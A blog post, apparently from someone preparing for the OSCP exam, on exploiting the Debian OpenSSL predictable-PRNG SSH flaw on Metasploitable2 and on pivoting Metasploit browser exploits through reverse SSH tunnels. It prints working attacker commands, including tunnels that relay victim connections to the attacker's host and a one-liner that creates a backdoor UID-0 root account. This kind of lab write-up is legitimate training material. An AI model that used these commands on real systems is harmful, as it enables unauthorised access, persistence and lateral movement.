Exploiting Metasploitable2 Debian PRNG Bruteforce SSH

After my OffSec PWK lab time ran out, I’m working on exploiting vulnerabilities without using Metasploit beyond use of exploit/multi/handler in preparation for the OSCP exam.

Port 22, SSH:
Debian OpenSSL – Predictable PRNG Bruteforce SSH Exploit https://www.exploit-db.com/exploits/5720/

Note: I had to run this exploit multiple times before it found the right key. I found a blog post that gave Metasploitable2’s root key that worked. That key was in the key directory, it works to login, but the exploit wasn’t finding it. After some searching I read a blog post about pwnos by g0tM1lk that says sometimes it fails to find the key.

After running this exploit for the third time if finally finds the key and prints the command to run to ssh to Metasploitable2 as root without password.

How to use ssh pivoting with Metasploit exploits that require SRVHOST/SRVPORT and LHOST/LPORT

In my quest to get ssh pivoting working with Metasploit exploits, I found many examples of how to add routes and pivot through Metasploit. What I couldn’t find were examples on how to do this with exploits and payloads that require both SRVHOST/SRVPORT and LHOST/LPORT. An example of this is when the target only has port 3389 open, so you need a reverse payload to connect through your pivot host to you when hooking a browser.

When I used an established meterpreter session, backgrounded it, and entered “route add x.x.x.x x.x.x.x 1” to enter a route, when I ran an exploit using the meterpreter pivot host IP/Port for LHOST/LPORT for the payload reverse connection, metasploit would establish the LHOST/LPORT listener but would error out on the SRVHOST/SRVPORT listener when using the meterpreter pivot host IP address.

Example:
My pivot host that I have a meterpreter session on has IP address 10.1.1.1, my Kali vm has IP address 192.168.x.x, and I’m trying to lure victim 10.1.1.2 to my Metasploit browser exploit server. Host 10.1.1.2 doesn’t have a route to my Kali host, so a pivot is required.

In the exploit settings, if I used 10.1.1.1 for SRVHOST and LHOST, Metasploit would establish a server for the LHOST (reverse payload IP address) using the IP address of the meterpreter session host, but would throw errors for the SRVHOST IP address if it wasn’t on my local machine. (I’m running this on Kali 2.0 if it makes any difference.)

What ended up working for me:

On Kali and your pivot host, make sure that you “echo “GatewayPorts yes” >> /etc/ssh/sshd_config” and restart the ssh service first to allow the listeners on 0.0.0.0 (listening on all IP addresses), otherwise it will bind to 127.0.0.1 and the port will be unreachable to the victim.

When pivoting to another network and using any exploit that requires SRVHOST/SRVPORT and LHOST/LPORT, I setup two reverse ssh tunnels with:
ssh -R 10.x.x.xPivotHostIP:8000:KaliIPaddress:8001 username@pivothostIP
ssh -R 10.x.x.xPivotHostIP:9000:KaliIPaddress:9001 username@pivothostIP
… and set my SRVHOST/SRVPORT as KaliIPaddress/8001 and LHOST/LPORT as KaliIPaddress/9001.

I set the URIPATH to “/”, and lured the victim to http://10.x.x.xPivotHostIP:8000/ which would get tunneled through ssh to KaliIPaddress:8001

I wasn’t able to establish two ssh tunnels with the same username as the first session would disconnect when I established the second, so I created another user first. You can create a root user from a non-interactive session with:

useradd -ou 0 -g 0 username
echo “username:password”|chpasswd